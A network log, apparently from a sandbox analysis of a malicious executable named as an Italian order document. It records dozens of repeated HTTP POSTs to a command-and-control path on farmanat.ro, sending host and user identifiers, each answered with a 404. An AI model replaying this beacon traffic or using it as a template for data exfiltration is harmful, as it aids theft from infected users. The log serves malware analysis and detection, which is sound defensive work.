Nov 25, 2021 10:54:52.633761883 CET	7417	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.11.20	49828	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:05.424331903 CET	6316	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:05.457895994 CET	6316	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:05.509834051 CET	6317	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
80	192.168.11.20	49917	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:51.019889116 CET	6426	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:51.053482056 CET	6426	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:51.106699944 CET	6427	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
800	192.168.11.20	50648	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:53.019557953 CET	7418	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:53.053774118 CET	7418	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:53.105624914 CET	7418	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
801	192.168.11.20	50649	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:53.534334898 CET	7419	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:53.567799091 CET	7419	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:53.617039919 CET	7420	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
802	192.168.11.20	50650	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:54.011786938 CET	7420	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:54.045353889 CET	7421	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:54.099575996 CET	7421	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
803	192.168.11.20	50651	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:54.518848896 CET	7422	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:54.553011894 CET	7422	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:54.604268074 CET	7422	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
804	192.168.11.20	50652	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:55.034068108 CET	7423	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:55.068362951 CET	7423	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:55.121545076 CET	7424	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
805	192.168.11.20	50653	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:55.547945023 CET	7425	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:55.581582069 CET	7425	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:55.630640984 CET	7425	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
806	192.168.11.20	50654	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:56.056137085 CET	7426	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:56.090389013 CET	7426	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:56.140597105 CET	7427	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
807	192.168.11.20	50655	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:56.566469908 CET	7427	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:56.599968910 CET	7428	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:56.652795076 CET	7428	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
808	192.168.11.20	50656	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:57.072319984 CET	7429	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:57.106746912 CET	7429	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:57.157145023 CET	7429	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
809	192.168.11.20	50657	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:57.565910101 CET	7430	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:57.600450039 CET	7430	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:57.650789022 CET	7431	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
81	192.168.11.20	49918	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:51.567286015 CET	6427	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:51.600946903 CET	6427	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:51.650368929 CET	6428	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
810	192.168.11.20	50658	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:58.031225920 CET	7431	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:58.064599991 CET	7432	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:58.114200115 CET	7432	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
811	192.168.11.20	50659	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:58.463608027 CET	7433	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:58.497852087 CET	7433	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:58.547542095 CET	7433	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
812	192.168.11.20	50660	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:58.966615915 CET	7434	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:59.000210047 CET	7434	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:59.050348043 CET	7435	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
813	192.168.11.20	50661	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:59.471626043 CET	7435	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:59.505177975 CET	7436	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:59.554025888 CET	7436	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
814	192.168.11.20	50662	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:59.978508949 CET	7437	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:00.012969971 CET	7437	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:00.063477039 CET	7437	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
815	192.168.11.20	50663	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:00.435672998 CET	7438	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:00.469307899 CET	7438	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:00.520142078 CET	7439	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
816	192.168.11.20	50664	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:00.937403917 CET	7439	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:00.971019030 CET	7440	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:01.021702051 CET	7440	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
817	192.168.11.20	50665	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
